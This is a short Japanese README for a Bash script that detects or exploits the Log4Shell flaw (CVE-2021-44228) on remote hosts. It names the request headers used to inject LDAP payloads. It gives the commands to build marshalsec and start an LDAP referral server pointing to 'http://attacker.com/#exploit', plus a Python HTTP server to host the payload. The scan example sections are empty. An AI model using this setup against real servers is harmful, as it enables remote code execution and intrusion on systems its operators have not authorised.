
Log4j脆弱性CVE-2021-44228をリモートで識別するためのBashスクリプト。
Log4Shellの脆弱性をリモートで特定または悪用するためのbashスクリプト。 このツールは、LDAPペイロードとX-Api-Version、User-Agent、X-Forwarded-Forヘッダーを使用して様々なテストを実行します。
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
HTTPサーバーを起動します python3 -m http.server 8080
Javaがインストールされていること #sudo apt install default-jre
Curlがインストールされていること #sudo apt-get install curl
以下のパラメータを入力します:
#内部ネットワーク上のアプリケーションスキャンの例:

#インターネット上のアプリケーションスキャンの例:
